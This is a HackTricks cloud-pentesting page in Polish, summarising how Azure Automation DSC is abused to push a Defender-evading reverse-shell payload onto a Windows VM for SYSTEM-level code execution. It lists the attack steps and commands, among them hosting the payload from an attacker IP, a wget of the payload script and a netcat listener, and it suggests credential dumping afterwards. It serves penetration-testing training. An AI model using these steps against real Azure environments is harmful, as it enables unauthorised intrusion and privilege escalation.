Az - State Configuration RCE

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się sztuczkami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na GitHubie.

Sprawdź pełny post w: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Podsumowanie przygotowania infrastruktury serwera zdalnego (C2) i kroków

Przegląd

Proces polega na skonfigurowaniu infrastruktury serwera zdalnego do hostowania zmodyfikowanego ładunku Nishang Invoke-PowerShellTcp.ps1, nazwanego RevPS.ps1, zaprojektowanego w celu ominięcia Windows Defender. Ładunek jest serwowany z maszyny Kali Linux o IP 40.84.7.74 przy użyciu prostego serwera HTTP w Pythonie. Operacja jest realizowana w kilku krokach:

Krok 1 — Utwórz pliki

Wymagane pliki: Potrzebne są dwa skrypty PowerShell:

reverse_shell_config.ps1: Plik Desired State Configuration (DSC), który pobiera i wykonuje ładunek. Można go uzyskać z GitHub.
push_reverse_shell_config.ps1: Skrypt do publikacji konfiguracji na VM, dostępny na GitHub.

Dostosowanie: Zmienne i parametry w tych plikach muszą być dostosowane do specyficznego środowiska użytkownika, w tym nazwy zasobów, ścieżki plików oraz identyfikatory serwera/ładunku.

Krok 2 — Spakuj plik konfiguracyjny

Plik reverse_shell_config.ps1 jest kompresowany do pliku .zip, co czyni go gotowym do transferu do Azure Storage Account.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Krok 3 — Ustaw kontekst przechowywania i przesyłanie

Zszyfrowany plik konfiguracyjny jest przesyłany do zdefiniowanego kontenera przechowywania Azure, azure-pentest, za pomocą polecenia Set-AzStorageBlobContent z Azure.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Krok 4 — Przygotowanie Kali Box

Serwer Kali pobiera ładunek RevPS.ps1 z repozytorium GitHub.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

Skrypt jest edytowany, aby określić docelową maszynę wirtualną Windows i port dla odwrotnego powłoki.

Step 5 — Publish Configuration File

Plik konfiguracyjny jest wykonywany, co skutkuje wdrożeniem skryptu odwrotnej powłoki w określonej lokalizacji na maszynie wirtualnej Windows.

Step 6 — Host Payload and Setup Listener

Uruchamiany jest Python SimpleHTTPServer, aby hostować ładunek, wraz z nasłuchiwaczem Netcat do przechwytywania przychodzących połączeń.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

Zaplanowane zadanie wykonuje ładunek, osiągając uprawnienia na poziomie SYSTEM.

Wnioski

Pomyślne wykonanie tego procesu otwiera liczne możliwości dalszych działań, takich jak zrzut poświadczeń lub rozszerzenie ataku na wiele maszyn wirtualnych. Przewodnik zachęca do dalszej nauki i kreatywności w dziedzinie Azure Automation DSC.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAz - Automation Account NextAz - Azure App Service & Function Apps

Last updated 3 days ago